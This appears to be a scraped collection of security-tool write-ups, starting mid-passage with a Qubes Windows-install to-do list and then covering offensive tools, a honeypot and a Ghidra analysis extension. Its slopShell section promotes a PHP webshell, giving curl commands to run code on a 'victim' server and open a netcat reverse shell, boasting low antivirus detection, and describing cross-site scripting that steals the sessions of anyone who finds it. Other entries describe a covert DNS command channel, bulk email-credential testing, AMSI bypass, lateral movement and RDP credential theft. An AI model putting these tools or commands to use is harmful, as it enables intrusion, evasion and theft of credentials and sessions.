    • ISO 9660 is write-once (i.e. read-only) filesystem; you cannot just add a file to it without creating a whole new ISO
    • Blocking issue for supporting other versions of Windows
    • This is the same way VMWare does it as can be seen by the "Creating Disk..." part in the video below (Further research indicates that they use mkisofs)
    • In the future, it would be best for Qubes to do this by extending core admin for libvirt XML templates
      • Much faster
      • Saves storage due to not having to create a new ISO
  • auto-qwt takes D:\ making QWT put the user profile on E:\; it would be nicer to have it on D:\ so there is no awkward gap in the middle
  • Make Windows answer file automatically use default trial key for Windows installation without hard-coding any product keys anywhere (Windows is finicky on this one)
  • Support Windows 8.1-10 (Note: QWT doesn't fully officially any OS other than Windows 7 yet, however, everything is functional except the GUI driver)
  • Support Windows Server 2008 R2 to Windows Server 2019
  • Support Windows 10 Enterprise LTSC (Long Term Support Channel)
    • Provides security updates for 10 years, very stable and less bloat than stock Windows 10
  • Provision Chocolatey
  • Add an option to slim down Windows as documented for Qubes here
  • Make windows-mgmt air gapped
  • I recently discovered this is a Qubes Google Summer of Code project
    • Add automated tests
      • Using Travis CI for automated ShellCheck
    • ACPI tables for fetching Windows the license embedded there
      • Found more info on this, should be very simple by just placing the following jinja libvirt template extension in /etc/qubes/templates/libvirt/xen/by-name/<windows_qube>
        • Thanks to @jevank for the patch
    • Port to Python
      • This seems like it would be unnecessary for scripts like create-media.sh where the Python script would essentially just be calling out to external programs
      • This would certainly be suitable for qvm-create-windows-qube.sh though
        • This would allow us to interchange data between Dom0 and the VM without worrying about another Shellshock
  • Automatically select which answer file to use based on Windows ISO characteristics gathered from the wiminfo command (Currently a WIP; see branch)
    • wiminfo works just like DISM on Windows
    • Once core admin is extended to allow for libvirt XML templates (answer files) becomes possible (previous todo), we can also securely read the answer file from the ISO without even having to mount it as a loop device using libguestfs
      • I've also seen libguestfs used on QEMU/KVM so it's definitely a good candidate for this use case
      • Note that libguestfs cannot write (an answer file) to an ISO which is why we cannot use this library until we no longer need to create a whole new ISO to add the answer file to it
  • Follow this Whonix documentation to make Windows-Whonix-Workstation
  • Add functionality for create-media.sh to add MSUs (Microsoft Update standalone packages) to be installed during the Windows PE pass ("Installing updates...") of Windows setup
    • We could fix currently not working QWT installation for old Windows 7 SP1 and Windows Server 2008 R2 ISOs using KB4474419 to add SHA-256 support
    • Allows us to get rid of allow-drivers.vbs hack by fixing SHA-256 automatic driver installation bug
      • The other option is to have Xen sign their drivers with SHA-1 as well, which other driver vendors seem to do, but is not ideal from a security standpoint
    • Patch a couple Windows security bugs?
      • Patch BlueKeep for Windows 7 out-of-the-box
      • Windows Server 2008 R2 base ISO is also vulnerable to ETERNALBLUE and BlueKeep out-of-the-box
      • Probably not worth getting into that, users should just update the VM upon making it
  • Headless mode
    • Help wanted
      • What mechanism is there to accomplish this in Qubes? Something in Qubes GUI agent/daemon?
  • Package this project so its delivery can be made more streamlined and secure through qubes-dom0-update
    • Coming to Qubes R4.1
  • Consider adding ReactOS support as an open source alternative to Windows
    • This would be a good at least until a ReactOS template is made
    • Perhaps ReactOS developers may want to use this to develop ReactOS
    • Or maybe just add ReactOS as a template (outside of this project)
      • However, someone would have to maintain this template
      • Also, there may not be much point if QWT/Xen PV drivers don't work
        • At least for basic features like copy/paste and file transfer
    • Interest from both sides
    • ReactOS unattended installations look to be different than Windows ones
    • Only blocking issue I could find is the QEMU SCSI controller type
      • Qubes could extend core admin to support configuring the SCSI controller in the libvirt template
        • This solution seems better because according to this comment it would also fix a bunch of other OSs whose installer doesn't support our current SCSI controller
      • ReactOS could add support for our current SCSI controller type
      • ReactOS Issue
      • Qubes OS Issue
      • Exposing a different SCSI controller does not expand attack surface because QEMU runs in a Xen stub domain
    • ReactOS is in alpha so for most users this probably won't be viable right now
    • Help wanted
      • No timeline for this currently

End Goal

Have a feature similar (or superior) to VMWare's Windows "Easy Install" feature on Qubes. VMWare's solution is proprietary and only available in their paid products.

VirtualBox also has something similar but it's not as feature-rich.




DNS-Black-Cat(DBC) - Multi Platform Toolkit For An Interactive DNS Shell Commands Exfiltration, By Using DNS-Cat You Will Be Able To Execute System Commands In Shell Mode Over DNS Protocol

$
0
0


Multi-platform toolkit for an interactive C2C DNS shell, by using DNS-Black-Cat, you will be able to execute system commands in shell mode over a fully encrypted covert channel.


Server

ported as a python script, which acts as DNS server with required functionalities to provide interactive shell command interface.


Client

ported as the following file formats

  • Windows 32/64 executable (exe)
  • Linux 32/64 executable (ELF)
  • Powershell Script (ps1)
  • Dynamic Link Library (DLL)
  • MacOS Darwin x86_64

Highlights
  • The agent supports multi-platforms.
  • built-in feature with 0xsp-mongoose RED.
  • Available as win32/64 executable, Powershell script, Linux ELF.
  • Encrypted and encoded DNS Queries.
  • Traffic Segmentation.
  • Speed and stability.
  • Stealth and undetectable.

Releases
SystemSupported
Windows (EXE)YES
Windows (PS)YES
Windows (DLL)YES
LinuxYES
MacOSYES
BSDStill
AndroidStill

Support

Support the project for continuous development (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)


Wiki ?

https://0xsp.com/security%20research%20&%20development%20(SRD)/covert-dns-cc-for-red-teaming-ops



FireStorePwn - Firestore Database Vulnerability Scanner Using APKs

$
0
0


fsp scans an APK and checks the Firestore database for rules that are not secure, testing with or without authentication.

If there are problems with the security rules, attackers could steal, modify or delete data and raise the bill.

Install fsp
sudo wget https://raw.githubusercontent.com/takito1812/FireStorePwn/main/fsp -O /bin/fsp
sudo chmod +x /bin/fsp

Running fsp

Scanning an APK without authentication
fsp app.apk

Scanning an APK with authentication

With email and password.

fsp app.apk test@test.com:123456

With a token.

fsp app.apk eyJhbGciO...


Dystopia - Low To Medium Multithreaded Ubuntu Core Honeypot Coded In Python

$
0
0


Low to medium Ubuntu Core honeypot coded in Python.


Features
  • Optional Login Prompt
  • Logs commands used and IP addresses
  • Customize MOTD, Port, Hostname and how many clients can connect at once (default is unlimited)
  • Save and load config
  • Add support to a plethora of commands

Todo
  • Packet Capture
  • Better Logging
  • Service
  • Geolocation
  • Email Alerts
  • Insights such as charts & graphs
  • Add Default Configurations
  • Optimize / Fix Code

How to run
sudo apt update && sudo apt upgrade -y
python3 dystopy.py

Command Line Arguments
bind to --motd MOTD, -m MOTD specify the message of the day --max MAX, -M MAX max number of clients allowed to be connected at once. --username USERNAME, -u USERNAME username for fake login prompt and the user for the honeypot session --password PASSWORD, -p PASSWORD password for fake login prompt --hostname HOSTNAME, -H HOSTNAME hostname of the honeypot --localhost, -L host honeypot on localhost --save SAVE, -s SAVE save config to a json file --load LOAD, -l LOAD load a config file ">
usage: dystopia.py [-h] [--port PORT] [--motd MOTD] [--max MAX] [--username USERNAME] [--password PASSWORD]
[--hostname HOSTNAME] [--localhost] [--save SAVE] [--load LOAD]

Dystopia | A python honeypot.

optional arguments:
-h, --help show this help message and exit
--port PORT, -P PORT specify a port to bind to
--motd MOTD, -m MOTD specify the message of the day
--max MAX, -M MAX max number of clients allowed to be connected at once.
--username USERNAME, -u USERNAME
username for fake login prompt and the user for the honeypot session
--password PASSWORD, -p PASSWORD
password for fake login prompt
--hostname HOSTNAME, -H HOSTNAME
hostname of the honeypot
--localhost, -L host honeypot on localhost
--save SAVE, -s SAVE save config to a json file
--load LOAD, -l LOAD load a config file

How to add Support for More Commands

You can add support to new commands by editing the file "commands.json". The format is command:output
for eg

{
"dog":"Dog command activated!"
}


 

AnalyticsRelationships - Get Related Domains / Subdomains By Looking At Google Analytics IDs

$
0
0


subdomains by looking at Google Analytics IDs > Python/GO versions > By @JosueEncinar ">

> Get related domains / subdomains by looking at Google Analytics IDs
> Python/GO versions
> By @JosueEncinar

This script try to get related domains / subdomains by looking at Google Analytics IDs from a URL. First search for ID of Google Analytics in the webpage and then request to builtwith with the ID.

Note: It does not work with all websites.It is searched by the following expressions:

->  "www\.googletagmanager\.com/ns\.html\?id=[A-Z0-9\-]+"
-> GTM-[A-Z0-9]+
-> "UA-\d+-\d+"

Available versions:

Installation:

Installation according to language.


Python
> git clone https://github.com/Josue87/AnalyticsRelationships.git
> cd AnalyticsRelationships/Python
> sudo pip3 install -r requirements.txt

GO
> git clone https://github.com/Josue87/AnalyticsRelationships.git
> cd AnalyticsRelationships/GO
> go build -ldflags "-s -w"

Usage

Usage according to language


Python
> python3 analyticsrelationships.py -u https://www.example.com

Or redirect output to a file (banner or information messages are sent to the error output):

python3 analyticsrelationships.py -u https://www.example.com > /tmp/example.txt

GO
>  ./analyticsrelationships --url https://www.example.com

Or redirect output to a file (banner or information messages are sent to the error output):

>  ./analyticsrelationships --url https://www.example.com > /tmp/example.txt

Examples

Python

Output redirection to file /tmp/example.txt:


Without redirection:


GO

Without redirection:


Working with file redirection works just like in Python.


Author

This project has been developed by:


Disclaimer!

This is a PoC. The author is not responsible for any illegitimate use.




HookDump - Security Product Hook Detection

$
0
0


EDR function hook dumping

Please refer to the Zeroperil blog post for more information https://zeroperil.co.uk/hookdump/


Building source
  • In order to build this you will need Visual Studio 2019 (community edition is fine) and CMake. The batch file Configure.bat will create two build directories with Visual Studio solutions.
  • The project may build with MinGW with the correct CMake command line, this is untested YMMV.
  • There is a dependency on zydis disassembler, so be sure to update the sub-modules in git before configuring the project.
  • There is a 32bit and 64bit project, you may find that EDR's hook different functions in 32/64 bit so building and running both executables may provide more complete results

Notes
  • Some EDRs replace the WOW stub in the TEB structure (specifically Wow32Reserved) in order to hook system calls for 32 bit binaries. In this case you may see zero hooks since no jump instructions are present in NTDLL. Most likley you will see hooks in the x64 version as the syscall instruction is used for system calls instead of a WOW stub
  • We have noted that Windows Defender does not use any user mode hooks
  • This tool is designed to be run as a standard user, elevation is not required

Hook Types Detected

JMP

A jump instruction has been patched into the function to redirect execution flow


WOW

Detection of the WOW64 syscall stub being hooked, which allows filtering of all system calls


EAT

The address in the export address table does not match the address in the export address table in the copy on disc


GPA

GetProcAddress hook, an experimental feature, this is only output in verbose mode, when the result of GetProcAddress does not match the manually resolved function address. YYMV with this and some care should be taken to verify the results.


Verification

The only way to truly verify the correct working of the program is to check in a debugger if hooks are present. If you are getting a zero hooks result and are expecting to see something different, then first verify this in a debugger and please get in touch.



slopShell - The Only Php Webshell You Need

$
0
0


php webshell

Since I derped, and forgot to talk about usage. Here goes.

For this shell to work, you need 2 things, a victim that allows php file upload(yourself, in an educational environment) and a way to send http requests to this webshell.


Basic Usage Video(Hosted on Youtube):


Current VT Detection ratio: 2/59

Current VT Detection ratio (obfuscated version): 0/59


The issue with this detection happening is i have not found a viable workaround for the keyword of eval if there was no call to eval this script would be undetectable.


Setup

Ok, so here we go folks, there was an itch I had to write something in PHP so this is it. This webshell has a few bells and whistles, and more are added everyday. You will need a pgsql server running that you control. However you implement that is on you.

Debian: apt install -y postgresql php php-pear && python -m pip install proxybroker --user

RHEL Systems: dnf -y -b install postgresql-server postgresql php php-pear && python -m pip install proxybroker --user

WIN: install the php msi, and make sure you have an active postgresql server that you can connect to running somewhere. figure it out.

Once you have these set up properly and can confirm that they are running. A command I would encourge using is with pg_ctl you can create the DB that way, or at least init it and start it. Then all the db queries will work fine.


How to interact.

Firstly, you need to choose a valid User-Agent to use, this is kind of like a first layer of protection against your webshell being accidentally stumbled upon by anyone but you. I went with sp/1.1 as its a non typical user-agent used. This can cause red flags in a pentest, and your access or script to be blocked or deleted. So, be smart about it. Code obfuscation wouldnt hurt, I did not add that in because thats on you to decide. To use the shell, there are some presets to aid you in your pen test and traversal of the machine. I did not add much for windows, because I do not like developing for windows. If you have routines or tricks added or know about, feel free to submit an issue with your suggestion and ill add it. An example of how to use this webshell with curl:

curl https://victim/slop.php?qs=cqP -H "User-Agent: sp/1.1" -v

or to execute custom commands:

curl https://victim/slop.php --data "commander=id" -H "User-Agent: sp/1.1" -v

Or to attempt to establish a reverse shell to your machine:

curl https://victim/slop.php --data "rcom=1&mthd=nc&rhost=&rport=&shell=sh" -H "User-Agent: sp/1.1" -v

  • mthd = the method you want to use to establish the reverse shell, this is predefined in the $comma array, feel free to add to it, optional, if it is null, the script will choose for you.
  • rhost = you, now this and the rport are not required, as it defaults to using netcat with the ip address in the $_SERVER["REMOTE_ADDR"] php env variable.
  • rport = your listener port, the default was set to 1634, just because.
  • shell = the type of system shell you want to have. I know bash isnt standard on all systems, but thats why its nice for you to do some system recon before you try to execute this command.

Here is the better part of this shell. If someone happens upon this shell without supplying the exact user agent string specified in the script, this shell will produce a 500 error with a fake error page then it will attempt some XSS to steal that users session information and sends it back to a handler script on your server/system. This will then attempt to store the information in a running log file. If it is unable to do so, well the backup is your logs. Once the XSS has completed, this shell will redirect the user back to the root(/) of the webserver. So, youll steal sessions if someone finds this, can even beef it up to execute commands on the server on behalf of the user, or drop a reverse shell on the users browser through Beef or another method. The possibilities are legit endless.


Images of use cases

In browser, navigated to without the proper user-agent string. (1st level of auth)


Use in the terminal, which is how this was designed to work, using curl with the -vH "User-Agent: sp1.1" switches.


Obfuscated script example:


Generation 2 obfuscated script:


Interacting through the client script

Once the client script is complete, you as the operator will not need to interact though curl to utilize this shell. There will be a client script that you can use to execute all commands/control over. In addition to this client script, there is a dropper. This dropper will ensure the script is run at start up even if the website is removed. Including some call home functions, obfuscation if it is requested on a level from 1 to 3, with 3 being the highest as every function will be rot ciphered and then encoded in base64 within the whole file being base64 encoded with a random name assigned to the file itself. This can help avoid signature detection.


Encryption

Once the encryption routine is fully worked out, the dropper script will be encrypted, and highly obfuscated. Example output:

Base64 decoded: also a test 123
Re-Encoded: YWxzbyBhIHRlc3QgMTIz
Key: 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e
Key Length: 96
Encryption Result:
Array
(
[original] => also a test 123
[key] => 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e
[encrypted] => meIHs/y6_U7U~7(M
[base64_Encoded] => bWVJSAAdcw4veTZfVQU3VX43KE0=
)
Decrypt Test:
Array
(
[key] => 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e
[encrypted] => meIHs/y6_U7U~7(M
[decrypted] => YWxzbyBhIHRlc3QgMTIz
[base64_decoded] => also a test 123
[original] => also a test 123
)

Additional

This was going to remain private. But I decided otherwise.

Do not abuse this shell, and get a signature attached to it, this is quite stealthy right now since its brand new.

I as the maintainer, am in no way responsible for the misuse of this product. This was published for legitmate penetration testing/red teaming purposes, and/or for educational value. Know the applicable laws in your country of residence before using this script, and do not break the law whilst using this. Thank you and have a nice day.

If you have enjoyed this script, its is obligatory that you follow me and throw a star on this repo... because future editions will have more features(or bugs) depending on how you look at it.




IMAPLoginTester - Script That Reads A Text File With Lots Of E-Mails And Passwords, And Tries To Check If Those Credentials Are Valid By Trying To Login On IMAP Servers

$
0
0


IMAPLoginTester is a simple Python script that reads a text file with lots of e-mails and passwords, and tries to check if those credentials are valid by trying to login to the respective IMAP servers.


Usage:

usage: imaplogintester.py [-h] -i INPUT [-o OUTPUT] [-s] [-t SLEEP_TIME] [-T TIMEOUT] [-P SOCKS5_PROXY] [-v]

optional arguments:
-h, --help show this help message and exit
-i INPUT, --input INPUT
input file with e-mails and passwords
-o OUTPUT, --output OUTPUT
save successes to output file
-s, --show-successes show successes only (no failures)
-t SLEEP_TIME, --sleep-time SLEEP_TIME
set sleep time between tests (in seconds)
-T TIMEOUT, --timeout TIMEOUT
set login requests timeout (in seconds)
-P SOCKS5_PROXY, --socks5-proxy SOCKS5_PROXY
use a SOCKS5 proxy (eg: "localhost:9050")
-v, --verbose show verbose messages


CheeseTools - Self-developed Tools For Lateral Movement/Code Execution

$
0
0


This repository has been made basing onto the already existing MiscTool, so big shout-out to rasta-mouse for releasing them and for giving me the right motivation to work on them.


CheeseExec

Command Exec / Lateral movement via PsExec-like functionality. Must be running in the context of a privileged user. The tool is based on rasta-mouse CsExec, but is designed to allow additional control over the service creation, specifically:

  • Create (Search if the service exists, if not, tries to create it)
  • Start (Search if the service exists and is stopped, if that's the case attempts to start it; if not, tries to create it and start it)
  • Stop (Search if the service exists and is running, if that's the case attempts to stop it)
  • Delete (Search if the service exists and is running, if that's the case attempts to stop it than delete it, otherwise it deletes it)
CheeseExec.exe <targetMachine> <serviceName> <binPath> <action>

Also see TikiService.


CheesePS

Cheese PS is Command Exec / Lateral Movement framework. It relies on System.Management.Automation.PowerShell to load and run arbitrary code via PowerShell. The tool is natively capable of bypassing common restrictions creating and using PowerShell runspaces on local or remote targets. Must be running in the context of a privileged user (if using PowerShell Remoting).

The tool has been originally made as an enhancement of rasta_mouse CsPosh, but grew enough to become a framework on its own, and can now be used as a general PowerShell injector.

The idea behind this tool has been summarised in the following article:

The main functionalities implemented are:

  • BuiltIn CLM Bypass using REGINI
  • BuiltIn AmsiBypass that patches Amsi before executing any other command
    • Permits to specify an alternate PowerShell script for AMSI bypass
  • BuiltIn WldpBypass that patches WLDP before executing assemblies
    • Permits to specify an alternate PowerShell script for WLDP bypass
  • Import modules and script before execution
    • Against a local target: modules are imported via filesystem, smb, or http[s]
    • Against a remote target: modules are loaded directly from the local machine using WS-Management
  • Download binary and execute
    • Standard: Transfer -> Write to disk -> Execute
    • Reflective: Transfer -> Execute from memory
  • Supports AES Encryption of PS modules, C# assemblies and other executables to evade detection
    • All imported Modules/Assemblies can be encrypted in transit or at rest, and are decrypted just before usage

The following screenshot is a decently accurate schema to describe the tool's workflow:

 

Usage:
-t, --target=VALUE Target machine
-c, --code=VALUE Code to execute
-e, --encoded Indicates that provided code is base64 encoded
-a, --am-si-bypass=VALUE Uses the given PowerShell script to bypass A-M-S-
I (fs, smb o http[s])
--aX, --encrypted-am-si
Indicates that provided A.M.S.I. bypass is
encrypted
-i, --import=VALUE Imports additional PowerShell modules (fs, smb o
http[s])
--iX, --encrypted-imports
Indicates that provided PowerShell modules are
encrypted
-o, --outstring Append Out-String to code
-r, --redirect Redirect stderr to stdout
-d, --domain=VALUE Domain for alternate credentials
-u, --username=VALUE Us ername for alternate credentials
-p, --password=VALUE Password for alternate credentials
-X, --encrypt=VALUE Encrypt a script with an hardcoded key
-D, --decrypt=VALUE Test decryption of a script with an hardcoded key
-n, --skip-bypass=VALUE Skip A.M.S.I (A), WLDP (W) or ALL (*) Bypass
techniques
-l, --lockdown-escape Try to enable PowerShell FullLanguage mode using
REGINI
-w, --wldp-bypass=VALUE Uses the given PowerShell script to bypass WLDP
(fs, smb o http[s])
--wX, --encrypted-wldp Indicates that provided WLDP bypass is encrypted
-x, --executable=VALUE [Download and] Execute given executable
--xX, --encrypted-executable
Indicates that provided Exe/DLL is encrypted
--xCS, --executable-csharp
Indicates that the executable provided is C# -
(.NET)
-R, --reflective-injection Uses Invoke-ReflectivePEInjection to load the
assmebly from memory (requires Invoke-
ReflectivePEInjection to be imported!)
-P, --powershell-decrypt Force use of PowerShell-based decryption
-k, --encryption-key=VALUE Uses the provided key for encryption/decryption
--ssl Force use of SSL
-h, -?, --help Show Help

Note: If executed without a target, the script will execute against the local machine


Advantages of using the tool against raw PowerShell:
  • Cleaner, more intuitive command line
  • Automatic bypasses (CLM, AMSI, WLDP)
  • Avoids to perform outbound connections from the remote target (everything is transfered through WS-Management)
  • Supports full encryption in transit

Also see AmsiBypass.


CheeseDCOM

Command Exec / Lateral Movement via DCOM. Must be running in the context of a privileged user. This tool is based on rasta-mouse CsDCOM, but it's been improved to add additional methods, adapting to the new research made by Philip Tsukerman. There is also an experimental method to "fix" eventual attempts to disable affected DCOM objects via dcomcfg, but it requires some preconditions in order to work properly.

The idea behind this tool has been summarised in the following article:

Current Methods: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro.

Usage:
-t, --target=VALUE Target Machine
-b, --binary=VALUE Binary: powershell.exe
-a, --args=VALUE Arguments: -enc <blah>
-m, --method=VALUE Methods: MMC20Application, ShellWindows,
ShellBrowserWindow, ExcelDDE, VisioAddonEx,
OutlookShellEx, ExcelXLL, VisioExecLine,
OfficeMacro
-r, --reg, --registry Enable registry manipulation
-h, -?, --help Show Help

Note: If executed with -t ., the script will execute against the local machine

Also see Lateral Movement Using DCOM Objects and C#


CheeseRDP

RDP credentials stealer via RDI (reflective DLL injection). Must be running in the context of a privileged user, or a user with SeImpersonatePrivilege. This tool is built on top of RdpThief by MDSec, but it's been fully wrapped in a single C# to enable it to be run via .NET Reflection (Assembly.Load and similar). In this way, it's possible to run it via Covenant, without the struggle of uploading a DLL on the target system.

Usage:
CheeseRDP [actions]
Actions:
wait: keep listening for any new mstsc.exe process indefinitely (stop with ctrl-C)
clean: delete the credentials dump file if present
dump: dump the content of the file if present, parsing the credentials in a compact format

Note: If executed without options, the program will try to inject in an active mstsc.exe process (the default wait time is 10 seconds)


Credits


Kaiju - A Binary Analysis Framework Extension For The Ghidra Software Reverse Engineering Suite

$
0
0


CERT Kaiju is a collection of binary analysis tools for Ghidra.

This is a Ghidra/Java implementation of some features of the CERT Pharos Binary Analysis Framework, particularly the function hashing and malware analysis tools, but is expected to grow new tools and capabilities over time.

As this is a new effort, this implementation does not yet have full feature parity with the original C++ implementation based on ROSE; however, the move to Java and Ghidra has actually enabled some new features not available in the original framework -- notably, improved handling of non-x86 architectures. Since some significant re-architecting of the framework and tools is taking place, and the move to Java and Ghidra enables different capabilities than the C++ implementation, the decision was made to utilize new branding such that there would be less confusion between implementations when discussing the different tools and capabilities.

Our intention for the near future is to maintain both the original Pharos framework as well as Kaiju, side-by-side, since both can provide unique features and capabilities.

CAVEAT: As a prototype, there are many issues that may come up when evaluating the function hashes created by this plugin. For example, unlike the Pharos implementation, Kaiju's function hashing module will create hashes for very small functions (e.g., ones with a single instruction like RET causing many more unintended collisions). As such, analytical results may vary between this plugin and Pharos fn2hash.


Quick Installation

Pre-built Kaiju packages are available. Simply download the ZIP file corresponding with your version of Ghidra and install according to the instructions below. It is recommended to install via Ghidra's graphical interface, but it is also possible to manually unzip into the appropriate directory to install.

CERT Kaiju requires the following runtime dependencies:

NOTE: It is also possible to build the extension package on your own and install it. Please see the instructions under the "Build Kaiju Yourself" section below.


Graphical Installation

Start Ghidra, and from the opening window, select from the menu: File > Install Extension. Click the plus sign at the top of the extensions window, navigate and select the .zip file in the file browser and hit OK. The extension will be installed and a checkbox will be marked next to the name of the extension in the window to let you know it is installed and ready.

The interface will ask you to restart Ghidra to start using the extension. Simply restart, and then Kaiju's extra features will be available for use interactively or in scripts.

Some functionality may require enabling Kaiju plugins. To do this, open the Code Browser then navigate to the menu File > Configure. In the window that pops up, click the Configure link below the "CERT Kaiju" category icon. A pop-up will display all available publicly released Kaiju plugins. Check any plugins you wish to activate, then hit OK. You will now have access to interactive plugin features.

If a plugin is not immediately visible once enabled, you can find the plugin underneath the Window menu in the Code Browser.

Experimental "alpha" versions of future tools may be available from the "Experimental" category if you wish to test them. However these plugins are definitely experimental and unsupported and not recommended for production use. We do welcome early feedback though!


Manual Installation

Ghidra extensions like Kaiju may also be installed manually by unzipping the extension contents into the appropriate directory of your Ghidra installation. For more information, please see The Ghidra Installation Guide.


Usage

Kaiju's tools may be used either in an interactive graphical way, or via a "headless" mode more suited for batch jobs. Some tools may only be available for graphical or headless use, by the nature of the tool.


Interactive Graphical Interface

Kaiju creates an interactive graphical interface (GUI) within Ghidra utilizing Java Swing and Ghidra's plugin architecture.

Most of Kaiju's tools are actually Analysis plugins that run automatically when the "Auto Analysis" option is chosen, either upon import of a new executable to disassemble, or by directly choosing Analysis > Auto Analyze... from the code browser window. You will see several CERT Analysis plugins selected by default in the Auto Analyze tool, but you can enable/disable any as desired.

The Analysis tools must be run before the various GUI tools will work, however. In some corner cases, it may even be helpful to run the Auto Analysis twice to ensure all of the metadata is produced to create correct partitioning and disassembly information, which in turn can influence the hashing results.

Analyzers are automatically run during Ghidra's analysis phase and include:

  • DisasmImprovements = improves the function partitioning of the disassembly compared to the standard Ghidra partitioning.
  • Fn2Hash = calculates function hashes for all functions in a program and is used to generate YARA signatures for programs.

The GUI tools include:

  • Function Hash Viewer = a plugin that displays an interactive list of functions in a program and several types of hashes. Analysts can use this to export one or more functions from a program into YARA signatures.
    • Select Window > CERT Function Hash Viewer from the menu to get started with this tool if it is not already visible. A new window will appear displaying a table of hashes and other data. Buttons along the top of the window can refresh the table or export data to file or a YARA signature. This window may also be docked into the main Ghidra CodeBrowser for easier use alongside other plugins. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.
  • OOAnalyzer JSON Importer = a plugin that can load, parse, and apply Pharos-generated OOAnalyzer results to object oriented C++ executables in a Ghidra project. When launched, the plugin will prompt the user for the JSON output file produced by OOAnalyzer that contains information about recovered C++ classes. After loading the JSON file, recovered C++ data types and symbols found by OOAnalyzer are updated in the Ghidra Code Browser. The plugin's design and implementation details are described in our SEI blog post titled Using OOAnalyzer to Reverse Engineer Object Oriented Code with Ghidra.
    • Select CERT > OOAnalyzer Importer from the menu to get started with this tool. A simple dialog popup will ask you to locate the JSON file you wish to import. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.

Command-line "Headless" Mode

Ghidra also supports a "headless" mode allowing tools to be run in some circumstances without use of the interactive GUI. These commands can therefore be utilized for scripting and "batch mode" jobs of large numbers of files.

The headless tools largely rely on Ghidra's GhidraScript functionality.

Headless tools include:

  • fn2hash = automatically run Fn2Hash on a given program and export all the hashes to a CSV file specified
  • fn2yara = automatically run Fn2Hash on a given program and export all hash data as YARA signatures to the file specified
  • fnxrefs = analyze a Program and export a list of Functions based on entry point address that have cross-references in data or other parts of the Program

A simple shell launch script named kaijuRun has been included to run these headless commands for simple scenarios, such as outputing the function hashes for every function in a single executable. Assuming the GHIDRA_INSTALL_DIR variable is set, one might for example run the launch script on a single executable as follows:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2hash example.exe

This command would output the results to an automatically named file as example.exe.Hashes.csv.

Basic help for the kaijuRun script is available by running:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun --help

Please see docs/HeadlessKaiju.md file in the repository for more information on using this mode and the kaijuRun launcher script.


Further Documentation and Help

More comprehensive documentation and help is available, in one of two formats.

See the docs/ directory for Markdown-formatted documentation and help for all Kaiju tools and components. These documents are easy to maintain and edit and read even from a command line.

Alternatively, you may find the same documentation in Ghidra's built-in help system. To access these help docs, from the Ghidra menu, go to Help > Contents and then select CERT Kaiju from the tree navigation on the left-hand side of the help window.

Please note that the Ghidra Help documentation is the exact same content as the Markdown files in the docs/ directory; thanks to an in-tree gradle plugin, gradle will automatically parse the Markdown and export into Ghidra HTML during the build process. This allows even simpler maintenance (update docs in just one place, not two) and keeps the two in sync.

All new documentation should be added to the docs/ directory.


Building Kaiju Yourself Using Gradle

Alternately to the pre-built packages, you may compile and build Kaiju yourself.


Build Dependencies

CERT Kaiju requires the following build dependencies:

  • Ghidra 9.1+ (9.2+ recommended)
  • gradle 6.4+ (latest gradle 6.x recommended, 7.x not supported)
  • GSON 2.8.6
  • Java 11+ (we recommend OpenJDK 11)

NOTE ABOUT GRADLE: Please ensure that gradle is building against the same JDK version in use by Ghidra on your system, or you may experience installation problems.

NOTE ABOUT GSON: In most cases, Gradle will automatically obtain this for you. If you find that you need to obtain it manually, you can download gson-2.8.6.jar and place it in the kaiju/lib directory.


Build Instructions

Once dependencies are installed, Kaiju may be built as a Ghidra extension by using the gradle build tool. It is recommended to first set a Ghidra environment variable, as Ghidra installation instructions specify.

In short: set GHIDRA_INSTALL_DIR as an environment variable first, then run gradle without any options:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle

NOTE: Your Ghidra install directory is the directory containing the ghidraRun script (the top level directory after unzipping the Ghidra release distribution into the location of your choice.)

If for some reason your environment variable is not or can not be set, you can also specify it on the command like with:

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>

In either case, the newly-built Kaiju extension will appear as a .zip file within the dist/ directory. The filename will include "Kaiju", the version of Ghidra it was built against, and the date it was built. If all goes well, you should see a message like the following that tells you the name of your built plugin.

Created ghidra_X.Y.Z_PUBLIC_YYYYMMDD_kaiju.zip in <path/to>/kaiju/dist

where X.Y.Z is the version of Ghidra you are using, and YYYYMMDD is the date you built this Kaiju extension.


Optional: Running Tests With AUTOCATS

While not required, you may want to use the Kaiju testing suite to verify proper compilation and ensure there are no regressions while testing new code or before you install Kaiju in a production environment.

In order to run the Kaiju testing suite, you will need to first obtain the AUTOCATS (AUTOmated Code Analysis Testing Suite). AUTOCATS contains a number of executables and related data to perform tests and check for regressions in Kaiju. These test cases are shared with the Pharos binary analysis framework, therefore AUTOCATS is located in a separate git repository.

Clone the AUTOCATS repository with:

git clone https://github.com/cmu-sei/autocats

We recommend cloning the AUTOCATS repository into the same parent directory that holds Kaiju, but you may clone it anywhere you wish.

The tests can then be run with:

gradle -PKAIJU_AUTOCATS_DIR=path/to/autocats/dir test

where of course the correct path is provided to your cloned AUTOCATS repository directory. If cloned to the same parent directory as Kaiju as recommended, the command would look like:

gradle -PKAIJU_AUTOCATS_DIR=../autocats test

The tests cannot be run without providing this path; if you do forget it, gradle will abort and give an error message about providing this path.

Kaiju has a dependency on JUnit 5 only for running tests. Gradle should automatically retrieve and use JUnit, but you may also download JUnit and manually place into lib/ directory of Kaiju if needed.

You will want to run the update command whenever you pull the latest Kaiju source code, to ensure they stay in sync.


First-Time "Headless" Gradle-based Installation

If you compiled and built your own Kaiju extension, you may alternately install the extension directly on the command line via use of gradle. Be sure to set GHIDRA_INSTALL_DIR as an environment variable first (if you built Kaiju too, then you should already have this defined), then run gradle as follows:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle install

